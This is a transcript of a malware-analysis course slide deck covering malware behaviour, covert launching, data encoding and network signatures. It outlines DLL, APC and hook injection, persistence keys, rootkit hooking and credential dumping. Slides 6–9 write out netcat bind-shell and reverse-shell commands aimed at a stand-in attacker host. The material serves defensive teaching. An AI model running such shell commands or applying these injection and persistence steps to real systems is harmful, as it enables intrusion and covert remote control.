Presentation is loading. Please wait.

Presentation is loading. Please wait.

Part 4: Malware Functionality Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network.

Similar presentations

Presentation on theme: "Part 4: Malware Functionality Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network."— Presentation transcript:

1 Part 4: Malware Functionality Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network Signatures

2 Chapter 11: Malware Behavior

3 Common functionality 1.Downloaders 2.Backdoors 3.Credential stealers 4.Persistence mechanisms 5.Privilege escalation 6.Covering tracks (rootkits)

4 1. Downloaders Retrieve additional pieces of malware from network to execute Often packaged with an exploit In Windows, API call URLDownloadtoFileA used to download Followed by call WinExec to execute

5 2. Backdoor Malware that provides attacker with remote access to victim machine Most common type of malware Commonly use outgoing port 80 (HTTP) to blend in with other traffic Commonly implement reverse shells Allow attacker to execute commands as if they were on local system Examples: netcat, cmd.exe, remote administration tools

6 netcat On computer 1, execute program “echo hello” and redirect output to local netcat server on 8888 Connect to computer 1 at 8888 and redirect output to file foo.txt victim$ echo hello | nc –l –p 8888 attacker$ nc victim 8888 >foo.txt attacker$ cat foo.txt hello

7 netcat Backdoor shell listener Connecting to shell victim$ nc –l –p 8888 –e /bin/sh attacker$ nc comp1 8888

8 ConnectionAttempt Attacker Firewall Or NAT X nc –l –p 8888 –e /bin/sh nc victim 8888 Victim Getting past firewalls and NAT

9 netcat Bypass firewalls and NAT by “shoveling a shell” Make attacker run listener Victim initiates outgoing connection (e.g. IRC, HTTP) attacker$ nc -l -p 8888 victim$ nc attacker 8888 -e /bin/sh Connection shovel Attacker Firewall nc attacker 8888 –e /bin/sh nc –l –p 8888 Victim

10 Windows reverse shells cmd.exe equivalent to netcat CreateProcess Create a socket and connect it to server Tie stdin, stdout, and stderr of process to socket Multithreaded version can use CreateThread and CreatePipe

11 Remote administrator tools Similar to botnet command and control Victim beacons outside controller to receive instructions Example: Poison Ivy

12 3. Credential Stealers 3 main types Programs that monitor user logins Programs that dump credentials stored in Windows (e.g. password hashes) that can be attacked off-line Programs that log keystrokes

13 Monitoring user login Graphical Identification aNd Authentication (GINA) for Windows Login Winlogon process started Winlogon invokes GINA library code (msgina.dll) GINA requests credentials

14 Example: GINA interception FakeGINA sits between Winlogon and msgina.dll (Figure 11-2) Exploits mechanism intended to allow other means of authentication Configured to run by setting a Windows registry key HKLM\SOFTWARE\...\Winlogon\GinaDLL set to fsgina.dll Winlogon process winlogon executes fakegina.dll requests credentials fakegina.dll passes credentials to msgina.dll Logout hooked to store credentials (Listing 11-1)

15 Dumping credentials Password storage Typically, only hashes of passwords stored Users with forgotten passwords issued new ones Hash function well-known Dumping hashes allows dictionary attacks since users with weak passowrds subject to brute-force dictionary attacks off-line Windows hashes Security Account Manager (SAM) Local Security Authority Subsystem Service (LSASS)

16 Example: lsass dumping Pwdump, Pass-the-Hash (PSH) toolkits Pwdump performs DLL injection on lsass.exe (Local Security Authority Subsystem Service) Injects lsaext.dll Uses GetHash call to extract hashes Can be easily changed to avoid signatures Listing 11-2 “GrabHash” variant

17 Logging keystrokes Records keystrokes so attacker can observe typed data Kernel-based keyloggers Built into keyboard drivers User-space keyloggers Use Windows API to hook I/O functions (SetWindowsHookEx) or poll for state of keys (GetForegroundWindow and GetAsyncKeyState) Example polling keylogger: Listing 11-4

18 4. Persistence mechanisms Methods to ensure survival of malware on a system Windows Registry persistence Trojaning DLL load-order hijacking

19 Windows registry persistence Common key malware targets HKEY_LOCAL_MACHINE\SOFTWARE\Microso ft\Windows\CurrentVersion\Run + dozens more AppInit_DLLs Loaded into every process that loads User32.dll Stored in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\Windows Space delimited string of DLLs

20 Windows registry persistence Common key malware targets Winlogon Hooking logged events (logon, logoff, startup, shutdown, lock screen) \HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ When winlogon.exe generates an event, Windows checks the Notify registry key above for a DLL that will handle it SvcHost DLLs All services persist via registry svchost.exe – generic host process for services that run from DLLs \HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost \HKLM\System\CurrentControlSet\Services\ServiceName

21 Trojaning Malware patches binary or library to add its functionality Example: Nimda, Bliss Append code in existing section or in new section Change entry point to point to virus code Virus returns to target program after execution

22 typedef struct { unsigned char e_ident[EI_NIDENT]; Elf32_Halfe_type; Elf32_Halfe_machine; Elf32_Worde_version; Elf32_Addre_entry; Elf32_Offe_phoff; Elf32_Offe_shoff; Elf32_Worde_flags; Elf32_Halfe_ehsize; Elf32_Halfe_phentsize; Elf32_Halfe_phnum; Elf32_Halfe_shentsize; Elf32_Halfe_shnum; Elf32_Halfe_shstrndx; } Elf32_Ehdr;  interesting! “This member gives the virtual address to which the system first transfers control, thus starting the process” We can change this to point elsewhere (not main() ) Trojaning using the ELF header

23 Trojaning DLLs DllEntryPoint function tampering Table 11-1 pusha to save all registers in one instruction Look for popa to see return back to legitimate code Listing 11-5

24 Trojaning DLLs DLL load-order hijacking DLL search path in Windows Directory from which application was loaded Current directory System directory (GetSystemDirectory function) 16-bit system directory Windows directory (GetWindowsDirectory function) Directories in PATH environment variable Rename malicious library and place high in path

25 5. Privilege escalation Most users run as local administrators Malware uses privilege escalation for those that don't Exploit vulnerable code to obtain administrator privileges Many malware frameworks include such exploits (e.g. Access to restricted calls such as TerminateProcess and CreateRemoteThread

26 Using SeDebugPrivilege Modify security token of a process using AdjustTokenPrivileges to obtain Initially used as a tool for system-level debugging Add SeDebugPrivilege to process (Listing 11-6)

27 6. Covering tracks – rootkits Hide malicious activity Make malicious files, processes, network connections, and other resources invisible Most rootkits are kernel-mode to run at the same level as anti-virus/anti-malware

28 Function hooking Mechanism used to redirect function calls to injected attack code Replaces legitimate function with alternative one Two general methods Function table hooking Run-time data structures that contain function pointers that are invoked during program execution Hot patching function invocation (inline hooking) Modify JMP/CALL targets Modify function prologues to add detour to trampoline

29 Application code push call [imp_InternetConnect] … Import Address Table jmp InternetConnect jmp InternetAutodial jmp InternetErrorDlg … InternetConnect() push ebp lea ebp, [esp+var_5 8] sub esp, 29Ch … IAT hooking Import Address Table (IAT) used to call functions in libraries

30 IAT hooking Modify IAT to hijack a DLL call Makes a hack ‘portable’ to other applications Load rootkit hook function into memory Replace target function’s address in the IAT with address of hook function Figure 11-4 Application code push call [imp_InternetConnect] … Import Address Table jmp InternetConnect jmp InternetAutodial jmp InternetErrorDlg … x Rootkit Code InternetConnect() push ebp lea ebp, [esp+var_5 8] sub esp, 29Ch …

31 IAT hooking Method Locate import section from IAT Find IMAGE_IMPORT_DESCRIPTOR chunk of DLL that exports that function Locate IMAGE_THUNK_DATA which holds original address of imported function Replace address in IAT to point to your function and have your function eventually call the original Detection problems Legitimate hooking common Methods such as DLL forwarding makes benign vs. malicious hooks hard to discern Late binding Applications do late-demand binding where function addresses are not resolved until called Reduces amount of memory used But, won’t know what the legitimate values should be!

32 Example library hooks Processes rely on APIs provided others DLLs loaded at runtime into process address space Kernel32.dll, User32.dll, Gui32.dll, Advapi.dll Kernel32 loaded into private address space between 0x00010000 and 0x7FFE0000 Example: Hiding files in a directory Replace FindFirstFile(), FindNextFile() in Kernel32 to skip rootkit files Other DLLs DirectX/OpenGL APIs and time functions Typically hooked to implement cheating in on-line games Winsock API Hooked to monitor network traffic

33 Example library hook Hook keyboard/DirectInput APIs to obtain keyboard/mouse events GetKeyboardState(), GetKeyState(), GetDeviceState(), etc. SHORT WINAPI FakeGetAsyncKeyState(int vKey) { SHORT nResult = 0; if (g_bNeedMP) { if (vKey == VK_M) { nResult |= 0x8000; //’M’ pressed g_bNeedMP = FALSE; } else nResult = RealGetAsyncKeyState(vKey); //... return nResult; }

34 Detours Library developed by Microsoft in 1999 G. Hunt, D. Brubacker, “Detours: Binary Interception of Win32 Functions”, 3rd USENIX Windows NT Symposium, July 1999. Instrument and extend existing OS and application functionality simply A programmer-friendly “feature” of Windows to easily patch functions Call hooks modify tables and can be detected by anti-virus/anti- rootkit technology Detours modify function in-line Malware uses to extend application with malicious functions Commonly used to add malicious DLLs into existing binaries on disk Adds a new.detour section into PE structure and modifies import address table using setdll tool in Detours library Targets include authentication check, DRM checks, anti-virus code, file system scans

35 Detour mechanism Redirect functions inline via detour and trampoline Save initial instructions of function at the entry point Original bytes of function saved in trampoline Inject code (detour) to redirect execution to interceptor function (trampoline) Insert jump instruction into function directly Trampoline Implements 5 replaced bytes of original function Implements the function you want to execute jmps back to original target function plus 5

36 Detour details Replace function preamble with a 5-byte unconditional jmp Implement replaced instructions in trampoline code Before XP 55 push ebp 8bec mov ebp, esp Hard to hook since you must disassemble user code After XP 8bff mov edi, edi 55 push ebp 8bec mov ebp, esp Easy to hook, exactly 5 bytes MSFT intentionally did this to make hot patches easy

37 Detour details More powerful than IAT hooking Do not have problems with binding time No matter how the function is called, your code will run Functions appearing in multiple tables are handled in one step Can be used for both kernel and user functions

38 Detours Overwriting important code Must know which OS is being used Must also ensure no one else has tampered or patched the function already Must save the instructions being removed by detour Patching addresses Relative FAR JMP instruction target calculated at run-time Need to patch this with desired offset at run-time FAR JMPRest of original function Rootkit codeRemoved instructionsFAR JMP

39 Detour example Modify ZwDeviceIoControlFile to hide ports Listing 11-7: Get pointer to code location of function to insert hook into eax Table 11-2: Define “hook byte” template (detour) Copy address of hooking function into template (memcpy) Listing 11-8: Call to install hook bytes into ZwDeviceIoControlFile call Hook bytes can be installed deep into function to avoid detection

40 Targets for hooks and detours Disable or modify anti-virus process Disable software updates Disable periodic “rehooking” code Modify network operations and services Modify boot loader Have boot loader apply patches to kernel before loading Modify on-disk kernel Modify boot loader to allow new kernel to pass integrity check Registering as a driver or boot service Load on boot via run key in registry Must hide key from anti-virus after being loaded

41 In-class exercise Lab 11-1

42 Chapter 12: Covert Malware Launching

43 Covert Launching Methods 1.Launchers 2.Process Injection 3.Process Replacement 4.Hook Injection 5.Detours 6.APC Injection

44 1. Launchers Malware that sets itself up for immediate or future covert execution Often contain malware that is to be executed in a resource section See previous Lab 11-01 Uses FindResource, LoadResource, and SizeofResource API calls to extract

45 2. Process injection Inject code into another running process Bypasses host-based firewalls and process- specific security mechanisms Force process to call VirtualAllocEx, then WriteProcessMemory to inject code Two injection types: DLL injection, direct injection

46 DLL injection Force remote process to load a malicious DLL Most common covert loading technique Remotely inject code into process that calls LoadLibrary OS automatically executes DllMain of newly loaded libraries All actions appear to originate from compromised process Figure 12-1

47 DLL injection into running process

48 DLL injection Method #1 CreateToolhelp32Snapshot, Process32First, Process32Next API calls to search the process list for victim process Get PID of victim and use OpenProcess to obtain handle Allocate space for name of malicious DLL in victim process VirtualAllocEx allocates space in remote process if handle provided Call WriteProcessMemory to write string into victim process where VirtualAllocEx obtained space Call CreateRemoteThread to start a new thread in victim lpStartAddress : starting address of thread (set to address of LoadLibrary) lpParameter : argument for thread (point to above memory that stores name of malicious DLL Listing 12-1, Figure 12-2 J. Richter, “Load Your 32-bit DLL into Another Process’s Address Space Using INJLIB”, Microsoft Systems Journal/9 No. 5

49 DLL injection Preserving original functionality Still need original functions to work correctly Injected DLL often set up to call original DLL to support desired functionality Interposed between application and real DLL Example tool Inject.exe (Aphex) C:\> inject.exe winlogon “myrootkit.dll”

50 DLL injection Method #2 using Windows Debug API Attacker must have Debug programs rights on system Get debugger attached to process and run Break when you want to inject Obtain code to inject/load a DLL into memory space Analyze PE header to find a usable, writable part of memory for code ReadProcessMemory to save what is there WriteProcessMemory to write injection code Include INT 3 at end of injection code for debugger to stop Set EIP to start of code to inject a DLL and continue Breaks when DLL loaded, restore original state of memory (i.e. remove code to inject DLL) Even easier with a code cave (no need to save memory)

51 Communications Technology Lab Code cave Code cave example

52 Direct code injection Similar to DLL injection, but write all code into victim process directly No DLL Requires custom code that will not disrupt victim process Often used to inject shellcode Mechanism Allocate space for new thread’s data and code Write data and code Create new thread pointing to injected code VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread

53 3. Process replacement Overwrite memory space of running process with malicious executable Disguise malware without risking crashes from partial injection Example: svchost.exe Start svchost in suspended state Pass CREATE_SUSPENDED as the dwCreationFlags parameter when calling CreateProcess (Listing 12-2, 12-3) Release all memory using ZwUnmapViewOfSection Allocate memory for malicious code via VirtualAllocEx WriteProcessMemory to write malware sections SetThreadContext to fix entry point to point to malicious code ResumeThread to initiate malware Bypasses firewalls and intrusion prevention systems since svchost runs many network daemons

54 4. Hook injection Interpose malware using Windows hooks Hooks used to handle messages and events going to/from applications and operating system Use malicious hooks to run certain code whenever a particular message is intercepted (i.e. keystrokes) Use malicious hooks to ensure a particular DLL is loaded in a victim's memory space (i.e. process loaded event) Types of hooks Local hooks: observe and manipulate messages internally within process Remote hooks: observe and manipulate messages destined for a remote process

55 Hook examples Keyboard hooks Registering hook code using WH_KEYBOARD or WH_KEYBOARD_LL hook procedure types to implement keyloggers Windows hooks Register hook with SetWindowsHookEx to capture window events Targeting threads Hooks must determine which thread to attach to Malware must include code to get dwThreadId of victim Search process listing to find Intrusion Prevention Systems look for suspicious hooks Listing 12-4

56 5. Detours See previous chapter Figure 12-4 Example: MigBot Detours two kernel functions: NtDeviceIoControlFile and SeAccessCheck Both are exported and have entries in the PE header

57 6. APC injection APC = Asynchronous Procedure Call CreateRemoteThread requires overhead More efficient to invoke function on an existing thread Each thread has an APC function queue attached to it Threads execute all functions in APC queue when in an alertable state (i.e. swapped out) e.g. after calls to WaitForSingleObjectEx, WaitForMultipleObjectsEx, and SleepEx Malware performs APC injection to preempt threads in an alertable state to get immediate execution of their code Two forms Kernel-mode: APC generated for the system or a driver User-mode: APC generated for an application

58 APC injection from user space One thread can queue a function to be invoked in another via API call QueueUserAPC WaitForSingleObjectEx is the most common call to the Windows API Listing 12-5: OpenThread followed by QueueUserAPC using LoadLibraryA on a malicious DLL (dbnet.dll) Note: calls to CreateToolhelp32Snapshot or ZwQuerySystemInformation, Process32First, Process32Next, Thread32First, and Thread32Next usually precede this snippet

59 APC injection from kernel space Malicious drivers in kernel often would like to execute code in user space Listing 12-6: kernel code to inject an APC into user space

60 In-class exercise Lab 12-1, 12-3

61 Chapter 13: Data Encoding

62 Data Encoding Goal Defeat signature-detection by obfuscating malicious content Encrypt network communication Hide command and control location Hide staging file before transmission Hide from “strings” analysis Methods Simple Ciphers Common Cryptographic Algorithms Custom Encoding Decoding

63 Simple ciphers Caesar Cipher Shift/Rotate characters XOR Bit-wise XOR of data with a fixed byte or generated byte stream Figure 13-1 For a fixed byte XOR, can brute force all 256 values to find a header that makes sense (Table 13-1, Listing 13-2) Some malware uses null-preserving XOR to make detection less obvious Decoding loops easy to identify via searching for xor opcode Figure 13-2

64 Simple ciphers Base-64 From MIME standard Represents binary data in an ASCII string format Binary data converted into one of 64 primary characters [a-zA-Z0-9+/], = used for padding Every 3-bytes of binary data is encoded in 4-bytes of Base64 (Figure 13-4) Example: 3 byte binary =01001101 01100001 01101110 4 byte Base64 = 010011 010110 000101 101110 TWFu 0 1 2 3 4 5 6 7 8 9 0A B C D E F G H I J 10K L M N O P Q R S T 20U V W X Y Z a b c d 30e f g h i j k l m n 40o p q r s t u v w x 50y z 0 1 2 3 4 5 6 7 608 9 + /

65 Simple ciphers Base-64 decoding Look for a string used as an index table ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/ Try on-line conversion tools Caution: Malware can easily modify index table to create custom substitution ciphers very easily (see book example)

66 Cryptographic ciphers Drawbacks Crypto libraries are large and easily detected Must hide the key for symmetric encryption algorithms Recognizing encrypted code Imports include well-known OpenSSL or Microsoft functions (Figure 13-9) Use of cryptographic constants (Figure 13-10) FindCrypt2 plugin in IDA Pro Krypto ANALyzer plugin for PEiD Some malware employs crypto algorithms that do not have constants (RC4, IDEA generate at run-time) Must search for high-entropy content (Figure 13-13)

67 Custom ciphers Look for hints Trace execution to see suspicious activity in a tight loop Example: pseudo-random number generation followed by xor (Figure 13-14, 13-15)

68 Decoding Self-decoding malware Malware packaged with decoding routine Tell-tale sign: strings that don't appear in binary file on disk, but appear in debugger Decrypt by setting a breakpoint directly after decryption routine finishes execution Malware employing decoding functions Malware relies on system libraries to decode (i.e. Python's base64.decodestring() or PyCrypto's functions) Listing 13-10 OpenSSL calls

69 In-class exercise Lab 13-1

70 Chapter 14: Malware-Focused Network Signatures

71 Networking and Malware 1.Network Countermeasures 2.Safely Investigating an Attacker Online 3.Content-Based Network Countermeasures 4.Combining Dynamic and Static Analysis Techniques 5.Understanding the Attacker's Perspective

72 1. Network Countermeasures IP connectivity Restrict network access using routers and firewalls DNS Reroute known malicious domains to an internal host (sinkhole) Content-filters Proxies, intrusion detection systems, an intrusion prevention systems for intercepting web requests in order to detect or prevent access

73 Network Countermeasures Mine logs, alerts, and packet captures from forensic information No risk of infection when performing post-mortem analysis versus actively attempting to run malware Malware can be programmed to detect active analysis Indications of malicious activity Beacons to malicious sites, especially if done without DNS query OPSEC: Operations Security Take preventative measures to guard against Malware authors detecting you are on to them by embedding one-time use name Malware authors capturing information about you such as your home IP address or contacts

74 2. Safely Investigating an Attacker Online Indirection Use network anonymizers such as Tor to hide yourself Use a virtual machine and virtual networks running through remote infrastructure (cellular, Amazon EC2, etc) IP address and DNS information See Regional Internet Registries to find out organizational assignment of IP blocks Query whois records of DNS names to find contact information metadata (

75 3. Content-Based Network Counter- Measures Intrusion Detection with Snort Rules that link together elements that must be true to fire Size of payload, flag fields, specific settings of TCP/IP headers, HTTP headers, content in payload Table 14-1: Wefa7e's HTTP User-Agent p. 303 Snort rule to detect Wefa7e Variants of malware may tweak User-Agent Use regexps to modify rule

76 4. Combining Dynamic and Static Analysis Techniques Steganography in protocols Attackers mimicking typical web requests Encoding commands in URLs and HTTP headers Encoding commands in meta-data of web pages Finding networking code to develop signatures WinSock API (WSAStartup, getaddrinfo, socket, connect, send, recv, WSAGetLastError) WinINet API (InternetOpen, InternetConnect, InternetOpenURL, InternetReadFile, InternetWriteFile, HTTPOpenRequest, HTTPQueryInfo, HTTPSendRequest COM interface (URLDownloadToFile, CoInitialize, CoCreateInstance, Navigate) Finding hard-coded patterns or stable content to create rules Reverse-engineering encoding or decoding scheme allows for accurate network signature generation

77 5. Understanding the Attacker’s Perspective Attackers will slightly change payloads to avoid detection Strategies Focus on elements that are part of both endpoints Focus on elements of protocol known to be part of a key (see above) Operate at a level that is different than other defenders (so that an attacker side-stepping another filter will not affect yours)

78 In-class exercise Lab 14-1

Download ppt "Part 4: Malware Functionality Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network."

Similar presentations

Ads by Google